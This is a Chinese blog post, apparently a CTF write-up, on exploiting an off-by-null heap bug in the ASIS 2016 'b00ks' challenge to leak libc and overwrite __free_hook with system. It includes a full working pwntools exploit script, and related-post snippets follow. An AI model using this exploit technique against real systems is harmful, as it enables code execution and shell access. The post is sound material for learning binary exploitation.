[PWN] BUUCTF asis2016_b00ks Offbynull利用

原创 已于 2023-10-02 13:04:24 修改 · 316 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #系统安全

于 2023-10-02 12:42:32 首次发布
本文描述了一个程序中offbyone漏洞的发现和利用过程,涉及输入缓冲区溢出导致地址泄露,通过修改book_ptr和desc来实现任意地址读写,进而获取libc基址并执行系统调用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

典型的offbyone利用

本地通过patchelf将环境修改为Ubuntu16 libc-2.23
checksec:
在这里插入图片描述
IDA:
菜单题:
在这里插入图片描述

漏洞函数:

在读取输入到缓冲区时,边界检查有问题,最后结束符"\x00"会被读取到size+1的位置
在这里插入图片描述

利用思路

首先会将author name 读取到 unk_202040 处,长度最大0x20个字节到 unk_202060,但是由于offbynull,会导致 unk_202061 被溢出覆盖为 “\x00” 即0。
在这里插入图片描述在这里插入图片描述
而create创建books时会将指向book的指针存放在unk_202060开始的连续地址处,
因此unk_202060会存放第一本书的ptr,offbynull 漏洞 会修改book_ptr的最低字节为00
在这里插入图片描述在这里插入图片描述
创建第一本书后,author name 的结束符会被 第一本书的ptr覆盖,此时 打印 author name 就会连带打印出第一本书的ptr,达到泄露地址的目的。
因为堆的初始化是按页对齐的,而该程序book的生成规律是:name——>desc——>book
程序每创建一个 book 会分配 0x20 字节的结构来维护它的信息

struct book {
int id;
char *name;
char *description;
int size; }

因此offbynull 漏洞修改book_ptr的最低字节为00 => book_ptr0,相当于减小地址,可以达到接近desc地址的目的
这样一来,如果修改desc的内容可以顺序修改book_ptr0的内容,

可以在book_ptr0处伪造一个book stuct,
1.填充自己想要输出的内容,在调用print打印book_ptr0即可打印想要的内容,可以实现任意地址读
2.填充desc为自己想要修改的地址,搭配edit修改book_ptr0的desc可以实现任意地址写,

基于以上思路可以实现获取libc基址后,覆盖__free_hook或者__malloc_hook为system或one gadget

方法一:mmap

堆有两种拓展方式一种是 brk 会直接拓展原来的堆,另一种是 mmap 会单独映射一块内存。
mmap开辟出的块与libc基址的偏移是固定的,因此只要拿到mmap开辟出的chunk的地址,就能通过一个“固定的偏移”得到libc。
申请book2的name和desc都超大,即可mmap分配内存。

调试过程

author name,此时还未创建book,结束符"\x00"在2060字节处
在这里插入图片描述
创建book后,2060处被覆盖,此时print authorname时可以打印处book1的地址
在这里插入图片描述
此时desc距离book1的ptr被覆盖后的地址0x000055d0d7c3b100相差0xb0

在0x000055d0d7c3b100伪造book struct 后,该book结构为
序号:0x1
name_ptr:存储book2的name的指针
desc_ptr:存储book2的desc的指针
size:0x7fff
在这里插入图片描述
此时修改author name 后可以将book1的地址修改为0x000055d0d7c3b100,即伪造的book ,调用 print 时可以打印处book2的name和desc的地址
在这里插入图片描述

在这里插入图片描述
用此可以计算libc的基址,从而得到 free_hook system onegadget 等地址
在这里插入图片描述
接下来edit修改book1:0x000055d0d7c3b100的desc,即可将其指向free_hook,等价于将book2的desc指针修改为free_hook
在这里插入图片描述
在这里插入图片描述
最后edit修改book2的desc,即可将free_hook指向system
在这里插入图片描述
delete()即可调用free函数,free book2时相当于指向system(“/bin/sh”),获取shell
在这里插入图片描述

EXP

from pwn import *
from LibcSearcher import *
from time import *
context.log_level = 'debug'
# file_path = "./chall/1"
# local = 1
# remote_path = "node4.buuoj.cn:29718"
# elf = ELF("./chall/1")
# libc = ELF("/usr/lib/x86_64-linux-gnu/libc.so.6")
# if local != 1:
#     p = remote(remote_path.split(":")[0],int(remote_path.split(":")[1]))
# else:
#     p = process(file_path)

sd      = lambda payload        : p.send(payload)
sdl     = lambda payload        : p.sendline(payload)
sda     = lambda data,payload   : p.sendafter(data,payload)
sdla    = lambda data,payload   : p.sendlineafter(data,payload)
it      = lambda                : p.interactive()
rc      = lambda num            : p.recv(num)
rc_all  = lambda                : p.recv()
rcu     = lambda data           : p.recvuntil(data)
lbc     = lambda str1,str2      : LibcSearcher(str1,str2)
lg      = lambda name,data      : p.success("\033[1;31m%s\033[0m --> 0x%x" % (name,data))
get_addr_64 = lambda: u64(rcu(b"\x7f")[-6:].ljust(8,b"\x00"))

def db():
    gdb.attach(p)
    pause()
def dbs(src):
    gdb.attach(p, src)

def tb(x): #将输入内容转换为python3的比特流格式
    return(bytes(str(x),encoding='utf8'))
# asis2016_b00ks
p = process("./b00ks")
# remote_path = "node4.buuoj.cn:28229"
# p = remote(remote_path.split(":")[0],int(remote_path.split(":")[1]))
elf = ELF("./b00ks")
libc = ELF("./libc-2.23.so")
def create(book_size,name,desc_size,desc):
    rcu("> ")
    sdl(b"1")
    rcu(": ")
    sdl(tb(book_size))
    rcu(": ")
    sdl(name)
    rcu(": ")
    sdl(tb(desc_size))
    rcu(": ")
    sdl(desc)
def delete(id):
    rcu("> ")
    sdl(b"2")
    rcu(": ")
    sdl(tb(id))
def edit(id,desc):
    rcu("> ")
    sdl(b"3")    
    rcu(": ")
    sdl(tb(id))
    rcu(": ")
    sdl(desc)
def print1():
    rcu("> ")
    sdl(b"4")
def change(name):
    rcu("> ")
    sdl(b"5")     
    rcu(": ")
    sdl(tb(name))

rcu("Enter author name: ")
sdl(b"l"*32)
create(32,"a"*32,0x100,"a")#1
create(0x21000,"/bin/sh",0x21000,"/bin/sh")#2
# db()
print1()
rcu("l"*32)
book1_addr = u64(rc(6).ljust(8,b"\x00"))
lg("book1_addr",book1_addr)
book2_name_addr_ptr = book1_addr+0x38
book2_desc_addr_ptr = book1_addr+0x40
payload = b"a"*0xb0 + p64(1) + p64(book2_name_addr_ptr) + p64(book2_desc_addr_ptr) + p64(0x7fff)
edit(1,payload)
# db()
change("l"*32)
print1()
rcu("Name: ")
book2_name_addr = u64(rc(6).ljust(8,b"\x00"))
rcu("Description: ")
book2_desc_addr = u64(rc(6).ljust(8,b"\x00"))
lg("book2_name_addr",book2_name_addr)
lg("book2_desc_addr",book2_desc_addr)
# db()
libc_base = book2_name_addr - 0x5c7010
onegadget = libc_base + 0x45206
bin_sh = next(libc.search(b"/bin/sh")) + libc_base
system_addr = libc.symbols["system"] + libc_base
free_hook = libc_base + libc.symbols["__free_hook"]
lg("onegadget",onegadget)
lg("free_hook",free_hook)
lg("bin_sh",bin_sh)
lg("system_addr",system_addr)
edit(1,p64(free_hook))
# db()
edit(2,p64(system_addr))
# db()
# sleep(5)
delete(2)
it()

第二种 (待完善)

初探off-by-one之Asis CTF 2016 b00ks
Vicl1fe的博客
09-25 1081
题目链接:ctf-wiki 参考链接:传送门 如果不懂,可以加讨论qq群:946220807 欢迎大佬坐阵 Off-by-one 单字节溢出,顾名思义,可溢出并且只溢出一个字节。具体还是看题吧。实践出真理。 代码分析 拿到题后,是一个图书管理系统,代码实现五个功能 功能: 创建一个图书 删除图书 编辑图书 打印图书内容 修改作者的名字。 程序刚开始,会让你输入作者的名字,可以看到这里调用了...
asis2016-b00ks
40KO的博客
06-02 812
off-by-one 本题主要是堆上面的off-by-one漏洞利用。off-by-one的成因主要是输入边界考虑不周导致的单字节溢出。一种利用方式是通过修改chunk大小造成结构块之间的重叠,本题就是这种利用方式。 程序分析 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 savedreg...
asis2016_b00ks
z1r0的博客
03-21 633
asis2016_b00ks 查看保护 这个看上去很正常,跟进一下read_input 可以看到一个off-by-null漏洞。 这里的作者的名字和heap_ptr贴在了一起 攻击思路:一个off-by-null,看一下可不可以从author_addr这里入手 因为heap_ptr和author_addr贴在了一起,而read_input有一个off-by-null,可以通过change_author_name来使得heap_ptr低一字节被改在\x00。这里还有一个知识点,一开始输入0x20个数
Asis CTF 2016——b00ks
04-18 466
这程序是一个图书管理系统  #off-by-one 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 struct _IO_FILE *v3; // rdi 4 __int64 savedregs; // [rsp+20h] [rbp+0h] 5 6 ...
Asis CTF 2016 b00ks
Morphy_Amo的博客
02-22 3570
例题 Asis CTF 2016 b00ks ` 题目链接 1. 安全策略 [*] '/root/ctf/Other/pwn/heap/b00ks' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 开启了full RELRO,因此无法直接进行GOT表劫持。开启了PIE,也导致不能直接用
[Asis CTF 2016] b00ks —— Off-By-One笔记与思考
Tokameine的博客
09-13 1687
前言: 这道题做得有点痛苦......因为本地通常都很难和服务器有相同的环境,使用mmap开辟空间造成的偏移会因此而变得麻烦,并且free_hook周围很难伪造chunk,一度显然恐慌...... 不过本来应该很早就开始Off-By-One的学习的,竟然现在才注意到......惭愧 正文: book结构: struct book { int id; char *name; char *description; in...
Asis CTF 2016 b00ks(堆溢出NULL byte off-by-one)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-21 1636
Asis CTF 2016 b00ks1.题目获取2.查保护3.分析程序4.地址泄露泄露地址修改地址5.伪造结构体 1.题目获取 题目下载地址:点此下载 2.查保护 3.分析程序 IDA载入,查看main函数 这个函数读取一个名字,最长32个字节。 作者名被读到data段 sub_A89()打印程序功能,并获取用户输入的序号 sub_F55()的功能是添加书籍信息,在这个函数中可以分析到...
CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
堆溢出-off-by-one-b00ks
zhuo1358的博客
07-26 442
堆溢出_off_by_one,经典题目b00ks
[堆入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1449
[BUUCTF] asis2016_b00ks 堆入门off-by-null 刚开始学pwn就听说,堆的题目很魔幻,需要大量的基础知识。在漫长地啃堆基础原理以后,这是我第一次自己研究学习并且完全明白原理的堆题。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是堆题中最为常见的菜单题目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
[Asis CTF 2016] b00ks
ethan18的博客
08-01 331
这道题主要是用到了Off-By-One漏洞,还有利用mmap成立的堆与libc基址间距相等的原理。
buu刷题日记 asis2016_b00ks
qq_51474381的博客
05-18 616
1.漏洞点 一个off by null,但和其他堆题的利用不太一样。 输入name时可覆盖heaplist的最低位为0 2.利用思路 1.泄露heap地址 申请大的heap再free掉,show功能正常,直接泄露。 2.泄露libc && 改__free_hook heaplist的第一个指针最低位可覆盖为0,在对应位置伪造结构体,再结合edit和show功能实现任意读写,改freehook为system。 3.shell 申请时写入‘/bin/sh\x00’再
asis2016_b00ks --堆的off-by-null
kissyunlei的博客
02-17 690
非常典型的off-by-null题,思路清晰,结构体指向难找,欢迎师傅们来看
Asis CTF 2016 b00ks理解
weixin_30666753的博客
03-05 354
---恢复内容开始--- 最近在学习堆的off by one,其中遇到这道题,萌新的我弄了大半天才搞懂,网上的很多wp都不是特别详细,都得自己好好调试。 首先,这题目是一个常见的图书馆管理系统,虽然我没见过。 1. Create a book 2. Delete a book 3. Edit a book 4. Print book detail 5. Change ...
off by one --- Asis CTF 2016 b00ks题解
coco的博客
11-18 659
确定漏洞点 首先,checksec查看开了哪些保护,其中PIE会使我们的调试难度稍稍增加。 再执行程序之后是一个经典的菜单选择,可以大概判断是与堆的利用有关。 通过用ida反编译之后查看,发现有一个关于读的函数会多读入一个\x00,造成了一个null off by one的漏洞。 程序分析 create 函数 创建了book name的堆 创建了book description的堆 创建了b...
【off by null】asis2016_b00ks
huzai9527的博客
05-13 335
【off by null】asis2016_b00ks 1. ida分析 在设置author name的时候存在off by null,输入32个字符后,会在后面添加\x00,author name 紧接着 booklist,当author name输入32字符后,创建一个book会覆盖\x00,此时print book会泄露book[0]的地址。 2. 思路 设置author name的长度为32(最后的\x00会被后创建的book[0]覆盖) 创建两个book,第二个book足够大(泄
buuctf pwn others_shellcode
最新发布
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成该挑战,需了解所使用的`libc`版本特性以及其对应的函数偏移地址等信息。这有助于定位并利用可能存在的漏洞点。此外,还需掌握基本的反汇编技能以便理解二进制文件的工作原理。 #### 漏洞分析 通过对程序逻辑的研究发现存在一处可以被攻击者控制的数据输入路径。当用户提交恶意构造的数据时,能够覆盖返回地址从而改变正常流程指向自定义指令序列的位置。这种技术被称为“Return-Oriented Programming (ROP)” 或直接注入 shellcode 执行。 #### Shellcode 构建 考虑到现代操作系统防护机制如NX bit 和 ASLR 的存在,在构建有效载荷时需要特别注意避开非法字符以免破坏栈结构完整性。同时也要考虑如何绕过这些安全措施以确保 payload 成功运行。一种常见做法是从内存中寻找可写区域作为跳转目标,并在那里放置精心设计过的 machine code 来打开 shell 或连接远程服务器发送 flag。 ```python from pwn import * context.arch = 'amd64' context.os = 'linux' # 连接至服务端口 conn = remote('challenge_address', port_number) # 发送payload前先读取一些数据防止阻塞 conn.recvuntil(b'Input your choice:') ``` #### Exploit 实现 最终解决方案涉及多个部分协同工作:首先是找到合适的 gadget 组合用于泄露 libc 基址;其次是计算出 system() 函数的确切位置;最后则是巧妙安排参数传递方式使得 execve("/bin/sh", ...) 能够被执行。整个过程要求精确控制每一步操作以达到预期效果而不触发任何异常终止条件。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值